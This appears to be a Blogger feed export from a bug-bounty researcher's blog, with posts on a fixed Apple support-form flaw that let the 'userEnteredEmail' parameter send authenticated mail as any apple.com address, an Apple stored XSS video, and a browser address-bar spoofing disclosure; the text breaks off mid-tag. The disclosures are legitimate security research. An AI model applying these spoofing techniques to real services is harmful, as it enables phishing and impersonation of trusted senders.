tag:blogger.com,1999:blog-34622777293090571232024-03-19T15:04:16.365+05:30Web Security Geeks - The Security BlogNarendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.comBlogger57125tag:blogger.com,1999:blog-3462277729309057123.post-36383153335338125642022-06-22T12:06:00.005+05:302024-01-05T08:15:29.541+05:30How I Was Able To Send Emails On Behalf of Any Apple User Email, Yes Any!!!<p> </p>
<div class="separator" style="clear: both; text-align: center;">
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<br />
</div>
<h1 style="clear: both; text-align: center;">
How I Was Able To Send Emails On Behalf of Any Apple User Email, Yes Any!!! 😜
</h1>
<div><br /></div>
<div><br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_sFaHTMI3COubGjq_rAwoVfRlHcLNWw--yf3Hvg02tBbM8ZCWIctzEXWnmTJJuXOkbuwjTtKsh_OazJZG4oTREUKGoC4Jf7Z1Fh7Gwn2EgNbCLChNu4z0_SBeaZkMyKCunu8UqjzDoMHp3RMqLpAyOEdILpkqIdGieG5o6UitreGdZRrU2kt19_xy/s1679/ss3.jpg"
imageanchor="1"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="1679"
data-original-width="1080"
height="400"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_sFaHTMI3COubGjq_rAwoVfRlHcLNWw--yf3Hvg02tBbM8ZCWIctzEXWnmTJJuXOkbuwjTtKsh_OazJZG4oTREUKGoC4Jf7Z1Fh7Gwn2EgNbCLChNu4z0_SBeaZkMyKCunu8UqjzDoMHp3RMqLpAyOEdILpkqIdGieG5o6UitreGdZRrU2kt19_xy/w258-h400/ss3.jpg"
width="258"
/></a>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;"><br /></div>
</div>
<div style="text-align: center;">
<b><br /></b>
</div>
<div>
<b>======================================================================</b>
</div>
<div>
<b><br /></b>
</div>
<div style="text-align: center;">
<u
>Disclosure permission was discussed with Apple Security Team before posting
this blog.</u
>
</div>
<div style="text-align: center;"><br /></div>
<div style="text-align: center;"><br /></div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;">
Hello All, During 2020 I have spend most of time on breaking Apple System and
getting good bugs out of Apple Security Bug Bounty Program. I have spend most
of time on Apple Products which is my personal favourite area (Not Web App)
but few of the bugs I have found was on Web Apps only.
</div>
<div style="text-align: left;"><br /></div>
<span><a name='more'></a></span>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;">
I have been asked over twitter/linkedin to disclose my findings and to be
frank after 2020 I was super packed with multiple activities and wasn't able
to write such as.
</div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;">
As this vulnerability [How I Was Able To Send Emails On Behalf of Any Apple
Email, Yes Any!!!] is very straight forward I decided to create a super quick
POC along with write up.
</div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;"><b>Impact</b></div>
<div style="text-align: left;">
An attacker can launch a mass level phishing attacks against apple users,
apple employees even an attacker can impersonate some one else identity ex.
Attacker can send emails on behalf of product-security@apple.com against bug
bounty hunters, tcook@apple.com against apple employees or security@apple.com
to notify apple users for security breaches notice.
</div>
<div style="text-align: left;">
<div style="font-weight: bold;"><br /></div>
</div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;">
<b><u>Timeline</u></b>
</div>
<div style="text-align: left;">
<b><br /></b>
</div>
<div style="text-align: left;">
<b>Initial Report - </b>Aug 24, 2020, 9:25 PM
</div>
<div style="text-align: left;">
<b>Triaged - </b>Aug 31, 2020, 10:43 AM
</div>
<div style="text-align: left;">
<b>Fixed Deployed - </b>Oct 14, 2020, 9:24 AM
</div>
<div style="text-align: left;">
<b>Bounty Awarded - </b>Nov 21, 2020, 5:24 AM
</div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;">
Let's start! The first Web Application as target I started working on <b
>https://developer.apple.com, </b
>despite most of the API EndPoint was good enough to protect against IDOR and
low hanging fruits.
</div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;">
After spending few moment, their support system got my attention which was
looks like this while my research.
</div>
<div style="text-align: left;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdvefJP2iLf-D9ve9vo2Nltg9xpCkP1qsgh9cMWZa94-1QFd5jtdDPU9wLnqQLdAJLxRavYKsupLhbhGZhthQv-eO_hcF2aihFmAVy2mEXFqIcPGoKlH8fW-gXl1tNc8PzY0LiUiDr-RqbM7_vRDDbCA3QOMZGwPHcqu-kodUqS_iM38TKnGjLVznX/s1602/Screenshot%202022-06-22%20at%208.42.23%20AM.png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="788"
data-original-width="1602"
height="315"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdvefJP2iLf-D9ve9vo2Nltg9xpCkP1qsgh9cMWZa94-1QFd5jtdDPU9wLnqQLdAJLxRavYKsupLhbhGZhthQv-eO_hcF2aihFmAVy2mEXFqIcPGoKlH8fW-gXl1tNc8PzY0LiUiDr-RqbM7_vRDDbCA3QOMZGwPHcqu-kodUqS_iM38TKnGjLVznX/w640-h315/Screenshot%202022-06-22%20at%208.42.23%20AM.png"
width="640"
/></a>
</div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: left;">
While sending support ticket, the API EndPoint had a parameter called
<b>userEnteredEmail</b> which was responsible for this vulnerability,
after changing that parameter with any <b>xxxx@apple.com </b>email. The victim
will received email from that email.
</div>
<div class="separator" style="clear: both; text-align: left;"><br /></div>
<div class="separator" style="clear: both; text-align: left;">
Ex. Here I have sent email on behalf of <b>security@apple.com</b>
</div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b>
</div>
<div class="separator" style="clear: both; text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiODIHRZGw149C2ZT6VVatMKbdfonPGWVrwFdUYDfDSf5QJ3kZjDHcy9wznRpCCQLEFlX-J40uHdHTLavhCURbWR4_MqkUReaBrd8wSGZA1h1uDQVIaq9NtI5zp3qm2QHmxRmKY2zoQpcT2IzFfiyJC62WYyXmgTz4-CTWVHx2pAlEb5ACvVMCx9UWR/s1280/Screenshot%202020-08-24%20at%2012.47.20%20PM%20(1).png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="736"
data-original-width="1280"
height="368"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiODIHRZGw149C2ZT6VVatMKbdfonPGWVrwFdUYDfDSf5QJ3kZjDHcy9wznRpCCQLEFlX-J40uHdHTLavhCURbWR4_MqkUReaBrd8wSGZA1h1uDQVIaq9NtI5zp3qm2QHmxRmKY2zoQpcT2IzFfiyJC62WYyXmgTz4-CTWVHx2pAlEb5ACvVMCx9UWR/w640-h368/Screenshot%202020-08-24%20at%2012.47.20%20PM%20(1).png"
width="640"
/></a>
</div>
<b><br /></b>
</div>
<div class="separator" style="clear: both; text-align: left;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
This if from <b>product-security@apple.com</b>
</div>
<div class="separator" style="clear: both; text-align: center;">
<b><br /></b>
</div>
<div class="separator" style="clear: both; text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcHjCK5KCPdNQF_Z2pFx8z52AyFXoBK9_Y7nna-cJ6zE1G8QcJkMx852f6f54rD_XsELtDzCypPpHBS5c5QlRvptM5Z3otG8OpUEMfSd9GcpClPME_wIuy2Lst-HMx08vl6WJ8ruwQgD85grQUxEyXGSuyS_6rsHpb8L-zDd6cjmPe9OmVffb0zWMx/s1212/Screenshot%202022-06-22%20at%208.50.32%20AM.png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="646"
data-original-width="1212"
height="342"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcHjCK5KCPdNQF_Z2pFx8z52AyFXoBK9_Y7nna-cJ6zE1G8QcJkMx852f6f54rD_XsELtDzCypPpHBS5c5QlRvptM5Z3otG8OpUEMfSd9GcpClPME_wIuy2Lst-HMx08vl6WJ8ruwQgD85grQUxEyXGSuyS_6rsHpb8L-zDd6cjmPe9OmVffb0zWMx/w640-h342/Screenshot%202022-06-22%20at%208.50.32%20AM.png"
width="640"
/></a>
</div>
<br /><b><br /></b>
</div>
<div class="separator" style="clear: both; text-align: center;">
This one is from timcook@apple.com for which few of you might be waiting for
😅
</div>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkuOOXxOZEvU7GgAhNA7nlGIBWl0EiNpP1l7WUkrCzQ2sjGtG9fg5uXsV-QrTn9fGdyyZQSrepJ6sHHTyrXRzTK4CN1NWLxFpndbi8f-BIVnx-Pc1sx1_-4nIfD5yL7FZKDV5-3sHgYqXFYlvqpVLMo4Ypx2ivQpxZE5eAJzmzJdlF2jePOOwudUms/s1642/Screenshot%202022-06-22%20at%208.52.44%20AM.png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="1178"
data-original-width="1642"
height="460"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkuOOXxOZEvU7GgAhNA7nlGIBWl0EiNpP1l7WUkrCzQ2sjGtG9fg5uXsV-QrTn9fGdyyZQSrepJ6sHHTyrXRzTK4CN1NWLxFpndbi8f-BIVnx-Pc1sx1_-4nIfD5yL7FZKDV5-3sHgYqXFYlvqpVLMo4Ypx2ivQpxZE5eAJzmzJdlF2jePOOwudUms/w640-h460/Screenshot%202022-06-22%20at%208.52.44%20AM.png"
width="640"
/></a>
</div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
Here is the complete Mail Header of this email.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgai8zoxfny4TFaUCCBkhlP6gd9JHdeTZfugCpMNow8N0QGUTMqCEbv2loZyfv-bM0Q16WZrAnDzUHxy88TPU_QaZewqJgHab1HpcYyRQlCsgWbR248BPZj5OcBGvwfyRZqsV2ViBjgVkWakDuVqrWlFFC9bhfHK2oV-k4DfhmeRQuzXvKiuOeHNM2B/s1630/Screenshot%202022-06-22%20at%208.53.45%20AM.png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="1152"
data-original-width="1630"
height="452"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgai8zoxfny4TFaUCCBkhlP6gd9JHdeTZfugCpMNow8N0QGUTMqCEbv2loZyfv-bM0Q16WZrAnDzUHxy88TPU_QaZewqJgHab1HpcYyRQlCsgWbR248BPZj5OcBGvwfyRZqsV2ViBjgVkWakDuVqrWlFFC9bhfHK2oV-k4DfhmeRQuzXvKiuOeHNM2B/w640-h452/Screenshot%202022-06-22%20at%208.53.45%20AM.png"
width="640"
/></a>
</div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: left;">
Also Gmail App have a feature called <b>SignedBy </b>which shows if the sender
email has passed all the Authentication.<span style="text-align: left;"
>The emails sent using this vulnerability are getting Signed by Apple.com
Which means It's actually sent from Apple Mail Server to the Receiving Mail
Server, also its passing all Mail Authentication Checks such as SPF (Sender
Policy Framework), DKIM (Domain Keys Identified Mail), DMARC(Domain-based
Message Authentication, Reporting & Conformance) which makes this more
severe.</span
>
</div>
<div class="separator" style="clear: both; text-align: left;">
<div class="separator" style="clear: both;"><br /></div>
<div class="separator" style="clear: both;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBCIICBEw7fcMkbFDYT1XpmJxZiMyJ8b2G2ZAQ5eIFDB_Ow1n-0mMREEBSvJjjT9SpwNvEh7stYGzNEfg9TrJExn_bnzr9B7QsTa8Z1BV7myLOf32amcfTC4ulWFhitcasd-_IiGQzYkebIwmxmmvRgI2BarvZIpczFAVTV81OoxzMZBjbSthaSq5X/s2088/Screenshot%202022-06-22%20at%209.19.48%20AM.png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="808"
data-original-width="2088"
height="248"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBCIICBEw7fcMkbFDYT1XpmJxZiMyJ8b2G2ZAQ5eIFDB_Ow1n-0mMREEBSvJjjT9SpwNvEh7stYGzNEfg9TrJExn_bnzr9B7QsTa8Z1BV7myLOf32amcfTC4ulWFhitcasd-_IiGQzYkebIwmxmmvRgI2BarvZIpczFAVTV81OoxzMZBjbSthaSq5X/w640-h248/Screenshot%202022-06-22%20at%209.19.48%20AM.png"
width="640"
/></a>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo7uWCvnxeZ1ipgmLtdER3FXnwz0_NZ_4fvgLYUPPTHbhvLzASpBakQ9O4l7CxiGgvfD49W4fxTzJcQ-feObD4yH6picBYDaevNDSVc5YvXktWQAP-7yFisuqAXMZhRanh-2kXKcunRuf83T6QFnLMxQQx0WObvd8shQlk382S4EfnGj4Vy2gJgSxX/s1679/IMG_20200825_163356.jpg"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="1679"
data-original-width="1080"
height="640"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo7uWCvnxeZ1ipgmLtdER3FXnwz0_NZ_4fvgLYUPPTHbhvLzASpBakQ9O4l7CxiGgvfD49W4fxTzJcQ-feObD4yH6picBYDaevNDSVc5YvXktWQAP-7yFisuqAXMZhRanh-2kXKcunRuf83T6QFnLMxQQx0WObvd8shQlk382S4EfnGj4Vy2gJgSxX/w412-h640/IMG_20200825_163356.jpg"
width="412"
/></a>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
POC Video
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe
allowfullscreen=""
class="BLOG_video_class"
height="266"
src="https://www.youtube.com/embed/Nu4yaxtYsMk"
width="453"
youtube-src-id="Nu4yaxtYsMk"
></iframe>
</div>
<br />
<div class="separator" style="clear: both; text-align: left;"><br /></div>
<div class="separator" style="clear: both; text-align: left;">
Also in the email there are few additional text which is coming up as
<b>Apple Support </b>but this is also looks good which makes victim trust
this email.
</div>
<div class="separator" style="clear: both; text-align: left;"><br /></div>
<br />
<div class="separator" style="clear: both;">
Please do share and let me know your comments. Happy Hacking to All.
</div>
<div class="separator" style="clear: both;"><br /></div>
</div>
<div style="text-align: left;">
<b><br /></b>
</div>
<div style="text-align: center;"><br /></div>
<div style="text-align: center;"><br /></div>
<div style="text-align: center;"><br /></div>
<div style="text-align: left;"><br /></div>
<div style="text-align: left;"><br /></div>
<br /><br />
<p>
<a href="https://g00gle.in/samesitebypasstemp/poc.php">link text</a>
</p>
Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-26949236629609990302022-02-05T10:47:00.004+05:302022-02-05T10:47:34.697+05:30Apple Stored XSS : $5000 Bounty<p style="text-align: center;"> </p><h1 class="title style-scope ytd-video-primary-info-renderer" style="-webkit-box-orient: vertical; -webkit-line-clamp: 2; border: 0px; color: var(--ytd-video-primary-info-renderer-title-color,var(--yt-spec-text-primary)); display: -webkit-box; font-family: var(--ytd-video-primary-info-renderer-title-font-family,inherit); font-size: var(--ytd-video-primary-info-renderer-title-font-size,var(--yt-navbar-title-font-size,inherit)); font-variant: var(--ytd-video-primary-info-renderer-title-font-variant,inherit); font-weight: 400; line-height: 2.6rem; margin: 0px; max-height: 5.2rem; overflow: hidden; padding: 0px; text-align: center; text-overflow: ellipsis; text-shadow: var(--ytd-video-primary-info-renderer-title-text-shadow,none); transform: var(--ytd-video-primary-info-renderer-title-transform,none);"></h1><h2><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"><br /></yt-formatted-string></h2><h2><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"><br /></yt-formatted-string></h2><h2 style="text-align: center;"><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"> Apple Stored XSS : $5000</yt-formatted-string></h2><div><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"><br /></yt-formatted-string></div><div><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"><br /></yt-formatted-string></div><div><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"><br /></yt-formatted-string></div><div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="352" src="https://www.youtube.com/embed/fz7_k8mYY3I" width="565" youtube-src-id="fz7_k8mYY3I"></iframe></div><br /><yt-formatted-string class="style-scope ytd-video-primary-info-renderer" force-default-style="" style="word-break: break-word;"><br /></yt-formatted-string></div><div class="style-scope ytd-video-primary-info-renderer" id="info" style="align-items: center; border: 0px; display: flex; flex-direction: row; margin: 0px; padding: 0px;"></div><br class="Apple-interchange-newline" />Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-79688484546675096782021-04-02T09:26:00.007+05:302021-05-17T07:36:03.828+05:30My Journey In Suma Soft From Stammer To Millionaire<h1 style="text-align: center;"><b> <span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;">My Journey In Suma Soft From Stammer To Millionaire - imnarendrabhati</span></b></h1><div style="text-align: center;"><b><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/2w5yM_5nueQ" width="608" youtube-src-id="2w5yM_5nueQ"></iframe></div><br /><span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;"><br /></span></b></div><div style="text-align: center;"><b><span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;"><br /></span></b></div><div style="text-align: center;"><b><span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;"><br /></span></b></div><div style="text-align: center;"><b><span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;"><br /></span></b></div><div style="text-align: center;"><b><span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;"><br /></span></b></div><div style="text-align: center;"><b><span color="rgba(0, 0, 0, 0.87)" face="Roboto, Noto, sans-serif" style="background-color: white; font-size: 15px; white-space: pre-wrap;"><br /></span></b></div>Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-68018076045450479172020-12-15T17:23:00.015+05:302023-10-28T14:37:00.690+05:30Address Bar Spoofing Vulnerability in Multiple Browsers<div><div style="text-align: left;"><div style="text-align: center;"><br /></div><div style="text-align: center;"><br /></div></div></div><div><br /></div><h1 style="clear: both; text-align: center;">Address Bar Spoofing Vulnerability in Multiple Browsers(<b>Jio Browser, Apple Safari Browser, BitDefender SafePay Browser and F-Secure Browser)</b></h1><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgwERf0NIQGAQEmm_VXYJddvzIHnwxbz3fScJQY5dULJ8CGvsGhPrY5n4M02_nHQ46lTFt2ZTU0U4KfL_-c4UiE_wg-OgLu0Ft0H81npRybxGLj5pSa1kwcHLwUfAfR3oQ_luSerpTvSs/s585/Screenshot+2020-11-12+at+7.40.46+PM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="585" data-original-width="321" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgwERf0NIQGAQEmm_VXYJddvzIHnwxbz3fScJQY5dULJ8CGvsGhPrY5n4M02_nHQ46lTFt2ZTU0U4KfL_-c4UiE_wg-OgLu0Ft0H81npRybxGLj5pSa1kwcHLwUfAfR3oQ_luSerpTvSs/w218-h396/Screenshot+2020-11-12+at+7.40.46+PM.png" width="218" /></a></div><br /><div><br /></div><h1 style="text-align: center;"><b>Jio Android Browser Address Bar Spoofing Vulnerability (Jio Browser, Apple Safari Browser, BitDefender SafePay Browser and F-Secure Browser)</b></h1><div style="text-align: center;"><br /></div><div style="text-align: left;"><a href="https://www.ehackingnews.com/search/label/URL%20Spoofing" target="_blank">Address Bar Spoofing/ URL Spoofing</a> vulnerability allows an attacker to show fake/malicious content on a valid domain.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">More Details on this is available over <a href="https://www.ehackingnews.com/" target="_blank">EHackingNews</a> website</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Ex. In the Left Side you can see on Address Bar showing as jio.com(Valid Content) and In the Right Side is also jio.com(Fake Contents) That's indicate an Address Bar Spoofing Vulnerability </div><div style="text-align: left;"><br /></div><span><a name='more'></a></span><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;"> </div><div style="text-align: left;"><b> jio.com(Valid Content)</b> <b>jio.com(Fake Contents)</b></div><div class="separator" style="clear: both; text-align: left;"><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjESz5OUyOLFIifYDB6G4e3U8fEmwUVN1ruo-y561amCtjoBO7SxnYryDd9bjpcCCkcX9FhP7PGCUVhyphenhyphengDq0EDQ1okL-SbJlVTTZzDIW4T0p1xfewnxLt9n0oW1v1OAA4ir8keXr5o6Jt0/s2160/Screenshot_20201119-181633.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2160" data-original-width="1080" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjESz5OUyOLFIifYDB6G4e3U8fEmwUVN1ruo-y561amCtjoBO7SxnYryDd9bjpcCCkcX9FhP7PGCUVhyphenhyphengDq0EDQ1okL-SbJlVTTZzDIW4T0p1xfewnxLt9n0oW1v1OAA4ir8keXr5o6Jt0/s320/Screenshot_20201119-181633.jpg" /></a>. <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpRH_ASfJSr97XVIjQglFhOrQZ_1aapi-gAfwzbhdxFc3WS4K8OR8rLbHCUCRnGugeVTvAgN-Sq3g9joa-mTeMR2Lk09lB0D7bf2G_bwQR4_8GwYWV8Ldf5poIvLv23bgn2VPHTOXzKAE/s2160/Screenshot_20201119-181611.jpg" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="2160" data-original-width="1080" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpRH_ASfJSr97XVIjQglFhOrQZ_1aapi-gAfwzbhdxFc3WS4K8OR8rLbHCUCRnGugeVTvAgN-Sq3g9joa-mTeMR2Lk09lB0D7bf2G_bwQR4_8GwYWV8Ldf5poIvLv23bgn2VPHTOXzKAE/s320/Screenshot_20201119-181611.jpg" /></a><br /><div class="separator" style="clear: both; text-align: center;"><br /></div></div></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;">After banning Chinese applications in India, people are encourage to use #MadeInIndia apps to promote Apps made by Indian companies/peoples. </div><div style="text-align: left;"><br /></div><div style="text-align: left;">Just like this Apps Made in India ex. Jio Browser got my attention as its have a Clean User Interface and easy to use feature just like other popular browser. While researching I found that Jio Browser isn't handling URL properly which allow a Malicious User to perform Address Bar Spoof attacks on User/Victims.</div><div style="text-align: left;"><br /></div><div style="text-align: center;">Here is the Video Demonstration</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/vGlPnqhJgEs" width="320" youtube-src-id="vGlPnqhJgEs"></iframe></div><div><br /></div><div><br /></div><b>Tested Environment</b><div><b><br /></b><div>Device - One Plus 5T <div>Android - 10.0.0</div><div>Jio Browser Version - 1.4.6</div><div><br /></div><div><b>Timeline of Reporting</b></div><div>Initial Report- Tue, Jun 30 2020</div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuTzvjQRrDYofPCwd06cca3YwxBktou40JYEGRvF6Q6FONo2kQRyP5T3WGRPZB1MBomzXSBhHWpxPEtiZUfBRV49nxLjAgTEH5WB_qf_MdQ-c3FjWp6lobgLJ1A3_5hohV4hDXB0eyNYU/s1280/1.Jio+Initial.jpeg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="1280" data-original-width="847" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuTzvjQRrDYofPCwd06cca3YwxBktou40JYEGRvF6Q6FONo2kQRyP5T3WGRPZB1MBomzXSBhHWpxPEtiZUfBRV49nxLjAgTEH5WB_qf_MdQ-c3FjWp6lobgLJ1A3_5hohV4hDXB0eyNYU/w265-h400/1.Jio+Initial.jpeg" width="265" /></a><br /><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>Initial Response - They responded Within a hour and seen the POCs and acknowledge the report and we exchanged few emails.</div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhvTibnQ8M6Ek4WEMeArq2rJwMfBQj1kVFKxt_ifTWYcKSPE56BovE4ihmynryO9TmQ28OLcc6AGgLh_7MDjauELL8Rq9TPv80L3VFCh-hoID1z3uRhVwYTZdrj2CLj7_cDqfAOaePTZY/s1218/2.Jio+Initial+Reply.jpeg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1218" data-original-width="1080" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhvTibnQ8M6Ek4WEMeArq2rJwMfBQj1kVFKxt_ifTWYcKSPE56BovE4ihmynryO9TmQ28OLcc6AGgLh_7MDjauELL8Rq9TPv80L3VFCh-hoID1z3uRhVwYTZdrj2CLj7_cDqfAOaePTZY/w355-h400/2.Jio+Initial+Reply.jpeg" width="355" /></a></div><br /><div><br /></div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div><br /></div><div>Stop Responding - <b>After few email exchange with them they Stop Responding me after Sep 5th 2020</b></div><div><b>Multiple(3) Reminder - Sent on Sep 5th and Sep 17th 2020</b></div><div><b><br /></b></div><div><b><br /></b></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbodnQSqOdEhknMhr2JWRA0nrNHPTpa-OhbhAirwoDcQYe7V3UUKhiz9VLMulCGJBAd94oKJrTa_bcepqy_jz_zpyFH1KdLrRyHuBCrbFEtWN6p3RQBPntow7sFRNqMv56aRU7taEAumc/s1325/3.Jio+Reminder+18+Augu.jpeg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1325" data-original-width="1080" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbodnQSqOdEhknMhr2JWRA0nrNHPTpa-OhbhAirwoDcQYe7V3UUKhiz9VLMulCGJBAd94oKJrTa_bcepqy_jz_zpyFH1KdLrRyHuBCrbFEtWN6p3RQBPntow7sFRNqMv56aRU7taEAumc/w326-h400/3.Jio+Reminder+18+Augu.jpeg" width="326" /></a></div><br /><b><br /></b></div><div><b><br /></b></div><div><br /></div><div><div><br /></div><br /><b><br /></b></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinGHdvc_QqaTjTByNnMnkMw-LK8bP94Ll3EkR0ChmzgTM7Agbxxreb2olIKqodFos34JsJOWlWbNhUpdzABoBR3DasfHiDZo_XPD0sNp3mssOKYmQE9GE2O_7tloe7F7knZHJqivNC5RA/s1065/4.Jio+Reminder+Reply.jpeg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1065" data-original-width="1049" height="400" 